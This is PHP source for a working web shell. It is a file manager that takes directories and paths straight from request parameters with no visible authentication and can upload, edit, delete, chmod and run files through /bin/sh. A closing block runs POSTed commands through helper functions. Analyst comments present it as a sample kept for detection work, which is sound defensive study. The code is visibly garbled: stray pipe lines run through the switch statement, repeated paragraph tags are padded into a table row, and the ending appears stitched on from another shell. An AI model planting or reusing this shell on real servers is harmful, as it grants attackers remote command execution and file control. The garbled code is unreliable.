 * Build a status message from a template in $words.
 *
 * The template is entity-encoded, newlines become <br />, the markers
 * "{ }" and "[ ]" become <pre> and <b> tags, and the placeholders %1..%8 are
 * replaced by the (encoded) arguments in order.
 *
 * @param string $phrase    key into $words
 * @param array  $arguments values for %1, %2, ...
 * @return string HTML fragment
 */
function phrase ($phrase, $arguments) {
    global $words;
    static $search;

    // The placeholder list is built once and kept across calls.
    if (!is_array($search)) {
        for ($n = 1; $n <= 8; $n++) {
            $search[] = "%$n";
        }
    }

    for ($k = 0; $k < sizeof($arguments); $k++) {
        $arguments[$k] = nl2br(html($arguments[$k]));
    }

    $replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
    $template = nl2br(html($words[$phrase]));
    $marked = str_replace(array_keys($replace), $replace, $template);

    return str_replace($search, $arguments, $marked);
}
/**
 * Return the table of UI strings and set the globals $date_format and
 * $word_charset as a side effect.
 *
 * Only an English table exists: 'en' and every other value of $lang end up
 * with the same result. Templates use %1, %2 as placeholders and "[ ]",
 * "{ }" as markup markers, both expanded by phrase().
 *
 * @param string $lang two-letter language code (has no effect on the result)
 * @return array map of message key to text
 */
function getwords ($lang) {
    global $word_charset, $date_format;

    $date_format = 'n/j/y H:i:s';
    $word_charset = 'ISO-8859-1';

    $table = array(
        // column headers and field labels
        'directory' => 'Directory',
        'file' => 'File',
        'filename' => 'Filename',
        'size' => 'Size',
        'permission' => 'Permission',
        'owner' => 'Owner',
        'group' => 'Group',
        'other' => 'Others',
        'functions' => 'Functions',
        // action names and buttons
        'read' => 'read',
        'write' => 'write',
        'execute' => 'execute',
        'create_symlink' => 'create symlink',
        'delete' => 'delete',
        'rename' => 'rename',
        'move' => 'move',
        'copy' => 'copy',
        'edit' => 'edit',
        'download' => 'download',
        'upload' => 'upload',
        'create' => 'create',
        'change' => 'change',
        'save' => 'save',
        'set' => 'set',
        'reset' => 'reset',
        'relative' => 'Relative path to target',
        'yes' => 'Yes',
        'no' => 'No',
        'back' => 'back',
        'destination' => 'Destination',
        'symlink' => 'Symlink',
        'no_output' => 'no output',
        'user' => 'User',
        'password' => 'Password',
        'add' => 'add',
        'add_basic_auth' => 'add basic-authentification',
        // status messages
        'uploaded' => '"[%1]" has been uploaded.',
        'not_uploaded' => '"[%1]" could not be uploaded.',
        'already_exists' => '"[%1]" already exists.',
        'created' => '"[%1]" has been created.',
        'not_created' => '"[%1]" could not be created.',
        'really_delete' => 'Delete these files?',
        'deleted' => "These files have been deleted:\n[%1]",
        'not_deleted' => "These files could not be deleted:\n[%1]",
        'rename_file' => 'Rename file:',
        'renamed' => '"[%1]" has been renamed to "[%2]".',
        'not_renamed' => '"[%1] could not be renamed to "[%2]".',
        'move_files' => 'Move these files:',
        'moved' => "These files have been moved to \"[%2]\":\n[%1]",
        'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]",
        'copy_files' => 'Copy these files:',
        'copied' => "These files have been copied to \"[%2]\":\n[%1]",
        'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]",
        'not_edited' => '"[%1]" can not be edited.',
        'executed' => "\"[%1]\" has been executed successfully:\n{%2}",
        'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}",
        'saved' => '"[%1]" has been saved.',
        'not_saved' => '"[%1]" could not be saved.',
        'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.',
        'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.',
        'permission_for' => 'Permission of "[%1]":',
        'permission_set' => 'Permission of "[%1]" was set to [%2].',
        'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
        'not_readable' => '"[%1]" can not be read.'
    );

    return $table;
}
/**
 * Intended to return the bytes of a named icon for the `?image=` request
 * handler. The body is empty in this copy, so the function returns null and
 * that handler sends an image/gif header with no content.
 */
function getimage ($image) {
}
/**
 * Page-header hook called at the top of every dialog and listing page. The
 * body is empty in this copy, so nothing is written here; any opening markup
 * would have to come from code outside this section.
 */
function html_header () {
}
/**
 * Close the HTML document: writes the closing body and html tags.
 */
function html_footer () {
    echo "</body>\n</html>";
}
/**
 * Build a success row for the listing table.
 *
 * Extra arguments after $phrase are passed to phrase() as the values for
 * %1, %2, ... in the message template.
 *
 * @param string $phrase key of the message template
 * @return string a <tr id="notice"> fragment
 */
function notice ($phrase) {
    global $cols;

    // Everything after the first argument is a placeholder value.
    $args = array_slice(func_get_args(), 1);

    $rows = array(
        '<tr id="notice"><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p>',
        '<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>',
        '</tr>',
        '',
    );
    return implode("\n", $rows);
}
/**
 * Build a failure row for the listing table.
 *
 * Extra arguments after $phrase are passed to phrase() as the values for
 * %1, %2, ... in the message template.
 *
 * @param string $phrase key of the message template
 * @return string a <tr id="error"> fragment
 */
function error ($phrase) {
    global $cols;

    // Everything after the first argument is a placeholder value.
    $args = array_slice(func_get_args(), 1);

    $rows = array(
        '<tr id="error">',
        '<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>',
        '</tr>',
        '',
    );
    return implode("\n", $rows);
}
////
// --- Request normalisation and working-directory resolution ---------------
// Everything below runs on every request to the file-manager tool. No
// authentication or origin check is visible in this part of the file; the
// directory to operate on is taken directly from the request.
$homedir = './';
// get_magic_quotes_gpc() was removed in PHP 8.0, so this call places the
// code on an older interpreter generation.
if (get_magic_quotes_gpc()) {
    array_walk($_GET, 'strip');
    array_walk($_POST, 'strip');
    array_walk($_REQUEST, 'strip');
}
// ?image=<name> short-circuits into the icon handler and ends the request.
if (array_key_exists('image', $_GET)) {
    header('Content-Type: image/gif');
    die(getimage($_GET['image']));
}
$delim = DIRECTORY_SEPARATOR;
// Platform detection: $win later hides the Unix-only columns and actions.
if (function_exists('php_uname')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
} else {
    $win = ($delim == '\\') ? true : false;
}
// Locate the directory the script itself lives in, trying progressively
// weaker sources.
if (!empty($_SERVER['PATH_TRANSLATED'])) {
    $scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
    $scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
} elseif (function_exists('getcwd')) {
    $scriptdir = getcwd();
} else {
    $scriptdir = '.';
}
$homedir = relative2absolute($homedir, $scriptdir);
// `dir` (GET, POST or cookie via $_REQUEST) selects the working directory;
// nothing here confines it to the web root.
$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
// A relative `dir` typed into the form is resolved against the directory the
// form was rendered for (`olddir`).
if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
    $dir = relative2absolute($dir, $_POST['olddir']);
}
$directory = simplify_path(addslash($dir));
// --- Action and target selection ------------------------------------------
// Decide which operation to run and on which paths. Four request shapes are
// recognised, in this order:
//   1. bulk:     submit_all + action_all + num, with checked<N>=true / file<N>
//   2. direct:   action=<name>&file=<path> (GET or POST)
//   3. upload:   submit_upload + multipart part named "upload"
//   4. per-row:  num + submit<N>, using action<N> / file<N>
// These parameter names are stable strings that can be matched in request
// logs or WAF rules for traffic to this script.
$files = array();
$action = '';
if (!empty($_POST['submit_all'])) {
    $action = $_POST['action_all'];
    // The loop bound and every path come from the POST body.
    for ($i = 0; $i < $_POST['num']; $i++) {
        if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
            $files[] = $_POST["file$i"];
        }
    }
} elseif (!empty($_REQUEST['action'])) {
    $action = $_REQUEST['action'];
    $files[] = relative2absolute($_REQUEST['file'], $directory);
} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
    // For uploads the "file" is the $_FILES entry, not a path.
    $files[] = $_FILES['upload'];
    $action = 'upload';
} elseif (array_key_exists('num', $_POST)) {
    // Find which row's submit button was pressed.
    for ($i = 0; $i < $_POST['num']; $i++) {
        if (array_key_exists("submit$i", $_POST)) break;
    }
    if ($i < $_POST['num']) {
        $action = $_POST["action$i"];
        $files[] = $_POST["file$i"];
    }
}
// Create-file / create-directory is considered only when nothing above
// matched.
if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
    $files[] = relative2absolute($_POST['create_name'], $directory);
    switch ($_POST['create_type']) {
    case 'directory':
        $action = 'create_directory';
        break;
    case 'file':
        $action = 'create_file';
    }
}
// With no target the request falls through to the plain listing; otherwise
// $file is the first selected target.
if (sizeof($files) == 0) $action = ''; else $file = reset($files);
// --- Environment defaults ---------------------------------------------------
// $lang, $dirpermission and $filepermission may be set earlier in the file
// (not visible here); the code below only fills in what is missing.
if ($lang == 'auto') {
    // First two characters of Accept-Language; getwords() returns the same
    // table whatever the value.
    if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
        $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
    } else {
        $lang = 'en';
    }
}
$words = getwords($lang);
// Column count of the listing table: the Unix view has three extra columns.
$cols = ($win) ? 4 : 7;
// Default modes for created directories and files follow the process umask.
if (!isset($dirpermission)) {
    $dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
}
if (!isset($filepermission)) {
    $filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
}
// $self is the script's own file name, used as the target of every form and
// link this tool emits.
if (!empty($_SERVER['SCRIPT_NAME'])) {
    $self = html(basename($_SERVER['SCRIPT_NAME']));
} elseif (!empty($_SERVER['PHP_SELF'])) {
    $self = html(basename($_SERVER['PHP_SELF']));
} else {
    $self = '';
}
// $apache gates the htpasswd/htaccess helpers in edit(); an absent
// SERVER_SOFTWARE value is treated as Apache.
if (!empty($_SERVER['SERVER_SOFTWARE'])) {
    if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
        $apache = true;
    } else {
        $apache = false;
    }
} else {
    $apache = true;
}
switch ($action) {
|
||
|
case 'view':
|
||
|
if (is_script($file)) {
|
||
|
ob_start();
|
||
|
highlight_file($file);
|
||
|
$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
|
||
|
$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
|
||
|
ob_end_clean();
|
||
|
html_header();
|
||
|
echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
|
||
|
<hr />
|
||
|
<table>
|
||
|
<tr>
|
||
|
<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
|
||
|
<pre style="margin-top: 0"><code>';
|
||
|
for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
|
||
|
echo '</code></pre>
|
||
|
</td>
|
||
|
<td style="text-align: left; vertical-align: top; padding-left: 3pt">
|
||
|
<pre style="margin-top: 0">' . $src . '</pre>
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
';
|
||
|
html_footer();
|
||
|
} else {
|
||
|
echo '<textarea name="code" cols="150" rows="50" wrap="VIRTUAL" >';
|
||
|
readfile($file);
|
||
|
}
|
||
|
break;
|
||
|
case 'download':
|
||
|
header('Pragma: public');
|
||
|
header('Expires: 0');
|
||
|
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
|
||
|
header('Content-Type: ' . getmimetype($file));
|
||
|
header('Content-Disposition: attachment; filename=' . basename($file) . ';');
|
||
|
header('Content-Length: ' . filesize($file));
|
||
|
readfile($file);
|
||
|
break;
|
||
|
case 'upload':
|
||
|
$dest = relative2absolute($file['name'], $directory);
|
||
|
if (@file_exists($dest)) {
|
||
|
listing_page(error('already_exists', $dest));
|
||
|
} elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
|
||
|
listing_page(notice('uploaded', $file['name']));
|
||
|
} else {
|
||
|
listing_page(error('not_uploaded', $file['name']));
|
||
|
}
|
||
|
break;
|
||
|
case 'create_directory':
|
||
|
if (@file_exists($file)) {
|
||
|
listing_page(error('already_exists', $file));
|
||
|
} else {
|
||
|
$old = @umask(0777 & ~$dirpermission);
|
||
|
if (@mkdir($file, $dirpermission)) {
|
||
|
listing_page(notice('created', $file));
|
||
|
} else {
|
||
|
listing_page(error('not_created', $file));
|
||
|
}
|
||
|
@umask($old);
|
||
|
}
|
||
|
break;
|
||
|
case 'create_file':
|
||
|
if (@file_exists($file)) {
|
||
|
listing_page(error('already_exists', $file));
|
||
|
} else {
|
||
|
$old = @umask(0777 & ~$filepermission);
|
||
|
if (@touch($file)) {
|
||
|
edit($file);
|
||
|
} else {
|
||
|
listing_page(error('not_created', $file));
|
||
|
}
|
||
|
@umask($old);
|
||
|
}
|
||
|
break;
|
||
|
case 'execute':
|
||
|
chdir(dirname($file));
|
||
|
$output = array();
|
||
|
$retval = 0;
|
||
|
exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
|
||
|
$error = ($retval == 0) ? false : true;
|
||
|
if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
|
||
|
if ($error) {
|
||
|
listing_page(error('not_executed', $file, implode("\n", $output)));
|
||
|
} else {
|
||
|
listing_page(notice('executed', $file, implode("\n", $output)));
|
||
|
}
|
||
|
break;
|
||
|
case 'delete':
|
||
|
if (!empty($_POST['no'])) {
|
||
|
listing_page();
|
||
|
} elseif (!empty($_POST['yes'])) {
|
||
|
$failure = array();
|
||
|
$success = array();
|
||
|
foreach ($files as $file) {
|
||
|
if (del($file)) {
|
||
|
$success[] = $file;
|
||
|
} else {
|
||
|
$failure[] = $file;
|
||
|
}
|
||
|
}
|
||
|
$message = '';
|
||
|
if (sizeof($failure) > 0) {
|
||
|
$message = error('not_deleted', implode("\n", $failure));
|
||
|
}
|
||
|
if (sizeof($success) > 0) {
|
||
|
$message .= notice('deleted', implode("\n", $success));
|
||
|
}
|
||
|
listing_page($message);
|
||
|
} else {
|
||
|
html_header();
|
||
|
echo '<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog">
|
||
|
<tr>
|
||
|
<td class="dialog">
|
||
|
';
|
||
|
request_dump();
|
||
|
echo "\t<b>" . word('really_delete') . '</b>
|
||
|
<p>
|
||
|
';
|
||
|
foreach ($files as $file) {
|
||
|
echo "\t" . html($file) . "<br />\n";
|
||
|
}
|
||
|
echo ' </p>
|
||
|
<hr />
|
||
|
<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
|
||
|
<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
break;
|
||
|
case 'rename':
|
||
|
if (!empty($_POST['destination'])) {
|
||
|
$dest = relative2absolute($_POST['destination'], $directory);
|
||
|
if (!@file_exists($dest) && @rename($file, $dest)) {
|
||
|
listing_page(notice('renamed', $file, $dest));
|
||
|
} else {
|
||
|
listing_page(error('not_renamed', $file, $dest));
|
||
|
}
|
||
|
} else {
|
||
|
$name = basename($file);
|
||
|
html_header();
|
||
|
echo '<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog">
|
||
|
<tr>
|
||
|
<td class="dialog">
|
||
|
<input type="hidden" name="action" value="rename" />
|
||
|
<input type="hidden" name="file" value="' . html($file) . '" />
|
||
|
<input type="hidden" name="dir" value="' . html($directory) . '" />
|
||
|
<b>' . word('rename_file') . '</b>
|
||
|
<p>' . html($file) . '</p>
|
||
|
<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
|
||
|
<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
|
||
|
<hr />
|
||
|
<input type="submit" value="' . word('rename') . '" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
break;
|
||
|
case 'move':
|
||
|
if (!empty($_POST['destination'])) {
|
||
|
$dest = relative2absolute($_POST['destination'], $directory);
|
||
|
$failure = array();
|
||
|
$success = array();
|
||
|
foreach ($files as $file) {
|
||
|
$filename = substr($file, strlen($directory));
|
||
|
$d = $dest . $filename;
|
||
|
if (!@file_exists($d) && @rename($file, $d)) {
|
||
|
$success[] = $file;
|
||
|
} else {
|
||
|
$failure[] = $file;
|
||
|
}
|
||
|
}
|
||
|
$message = '';
|
||
|
if (sizeof($failure) > 0) {
|
||
|
$message = error('not_moved', implode("\n", $failure), $dest);
|
||
|
}
|
||
|
if (sizeof($success) > 0) {
|
||
|
$message .= notice('moved', implode("\n", $success), $dest);
|
||
|
}
|
||
|
listing_page($message);
|
||
|
} else {
|
||
|
html_header();
|
||
|
echo '<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog">
|
||
|
<tr>
|
||
|
<td class="dialog">
|
||
|
';
|
||
|
request_dump();
|
||
|
echo "\t<b>" . word('move_files') . '</b>
|
||
|
<p>
|
||
|
';
|
||
|
foreach ($files as $file) {
|
||
|
echo "\t" . html($file) . "<br />\n";
|
||
|
}
|
||
|
echo ' </p>
|
||
|
<hr />
|
||
|
' . word('destination') . ':
|
||
|
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
|
||
|
<input type="submit" value="' . word('move') . '" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
break;
|
||
|
case 'copy':
|
||
|
if (!empty($_POST['destination'])) {
|
||
|
$dest = relative2absolute($_POST['destination'], $directory);
|
||
|
if (@is_dir($dest)) {
|
||
|
$failure = array();
|
||
|
$success = array();
|
||
|
foreach ($files as $file) {
|
||
|
$filename = substr($file, strlen($directory));
|
||
|
$d = addslash($dest) . $filename;
|
||
|
if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
|
||
|
$success[] = $file;
|
||
|
} else {
|
||
|
$failure[] = $file;
|
||
|
}
|
||
|
}
|
||
|
$message = '';
|
||
|
if (sizeof($failure) > 0) {
|
||
|
$message = error('not_copied', implode("\n", $failure), $dest);
|
||
|
}
|
||
|
if (sizeof($success) > 0) {
|
||
|
$message .= notice('copied', implode("\n", $success), $dest);
|
||
|
}
|
||
|
listing_page($message);
|
||
|
} else {
|
||
|
if (!@file_exists($dest) && @copy($file, $dest)) {
|
||
|
listing_page(notice('copied', $file, $dest));
|
||
|
} else {
|
||
|
listing_page(error('not_copied', $file, $dest));
|
||
|
}
|
||
|
}
|
||
|
} else {
|
||
|
html_header();
|
||
|
echo '<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog">
|
||
|
<tr>
|
||
|
<td class="dialog">
|
||
|
';
|
||
|
request_dump();
|
||
|
echo "\n<b>" . word('copy_files') . '</b>
|
||
|
<p>
|
||
|
';
|
||
|
foreach ($files as $file) {
|
||
|
echo "\t" . html($file) . "<br />\n";
|
||
|
}
|
||
|
echo ' </p>
|
||
|
<hr />
|
||
|
' . word('destination') . ':
|
||
|
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
|
||
|
<input type="submit" value="' . word('copy') . '" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
break;
|
||
|
case 'create_symlink':
|
||
|
if (!empty($_POST['destination'])) {
|
||
|
$dest = relative2absolute($_POST['destination'], $directory);
|
||
|
if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
|
||
|
if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
|
||
|
if (!@file_exists($dest) && @symlink($file, $dest)) {
|
||
|
listing_page(notice('symlinked', $file, $dest));
|
||
|
} else {
|
||
|
listing_page(error('not_symlinked', $file, $dest));
|
||
|
}
|
||
|
} else {
|
||
|
html_header();
|
||
|
echo '<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog" id="symlink">
|
||
|
<tr>
|
||
|
<td style="vertical-align: top">' . word('destination') . ': </td>
|
||
|
<td>
|
||
|
<b>' . html($file) . '</b><br />
|
||
|
<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
|
||
|
<label for="checkbox_relative">' . word('relative') . '</label>
|
||
|
<input type="hidden" name="action" value="create_symlink" />
|
||
|
<input type="hidden" name="file" value="' . html($file) . '" />
|
||
|
<input type="hidden" name="dir" value="' . html($directory) . '" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td>' . word('symlink') . ': </td>
|
||
|
<td>
|
||
|
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
|
||
|
<input type="submit" value="' . word('create_symlink') . '" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
break;
|
||
|
case 'edit':
|
||
|
if (!empty($_POST['save'])) {
|
||
|
$content = str_replace("\r\n", "\n", $_POST['content']);
|
||
|
if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
|
||
|
listing_page(notice('saved', $file));
|
||
|
} else {
|
||
|
listing_page(error('not_saved', $file));
|
||
|
}
|
||
|
} else {
|
||
|
if (@is_readable($file) && @is_writable($file)) {
|
||
|
edit($file);
|
||
|
} else {
|
||
|
listing_page(error('not_edited', $file));
|
||
|
}
|
||
|
}
|
||
|
break;
|
||
|
case 'permission':
|
||
|
if (!empty($_POST['set'])) {
|
||
|
$mode = 0;
|
||
|
if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
|
||
|
if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
|
||
|
if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
|
||
|
|
||
|
if (@chmod($file, $mode)) {
|
||
|
listing_page(notice('permission_set', $file, decoct($mode)));
|
||
|
} else {
|
||
|
listing_page(error('permission_not_set', $file, decoct($mode)));
|
||
|
}
|
||
|
} else {
|
||
|
html_header();
|
||
|
$mode = fileperms($file);
|
||
|
echo '<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog">
|
||
|
<tr>
|
||
|
<td class="dialog">
|
||
|
<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
|
||
|
<hr />
|
||
|
<table id="permission">
|
||
|
<tr>
|
||
|
<td></td>
|
||
|
<td style="border-right: 1px solid black">' . word('owner') . '</td>
|
||
|
<td style="border-right: 1px solid black">' . word('group') . '</td>
|
||
|
<td>' . word('other') . '</td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td style="text-align: right">' . word('read') . ':</td>
|
||
|
<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
</tr>
<tr>
<td style="text-align: right">' . word('write') . ':</td>
<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
</tr>
<tr>
<td style="text-align: right">' . word('execute') . ':</td>
<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
</tr>
</table>
<hr />
<input type="submit" name="set" value="' . word('set') . '" />
<input type="hidden" name="action" value="permission" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
</td>
</tr>
</table>
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
</form>
';
html_footer();
}
break;
default:
listing_page();
}
exit;
}
// Final page assembly for the default view. This point is reached only when
// the tool dispatcher above did not call exit. Every helper below prints
// straight into the response, so statement order is the output order.
//
// Analyst notes (this file is a web-shell sample kept for detection work):
//   - $dir, $function_tkl and $pwd are taken directly from $_POST at the top
//     of the file, so each helper here receives raw request data.
//   - The block is driven by POST fields named `function_tkl`, `pwd`, `dir`
//     and `command`; those field names are usable as log / WAF indicators.

// Left-hand cell. dirTKL() is defined elsewhere in the file; presumably it
// prints a listing of $dir -- confirm against its definition.
echo '<table width="100%" border="0"><tr><td rowspan="1">';
dirTKL($dir);

// Right-hand cell: a textarea that receives whatever the helpers print.
echo '</td><td align="right" valign="bottom" ><textarea rows="15" cols="100" >';

// Plain truthiness test on the POSTed selector (a value of '0' is skipped).
if ($function_tkl):
    readFileTKL($function_tkl, $pwd);
endif;

// exTKL() takes no arguments and is defined elsewhere; it runs whenever a
// truthy POST `command` field is present -- presumably the command runner,
// verify against its definition.
if ($_POST['command']):
    exTKL();
endif;

// $gaza_file is assigned outside this block and is echoed without escaping.
if ('mysql1' == $_POST['function_tkl']):
    echo $gaza_file;
endif;

// fotTKL() is defined elsewhere; it receives the status text, the database
// form markup and the working directory built earlier in the file.
fotTKL($gaza_text, $gaza_text1, $dir);
?>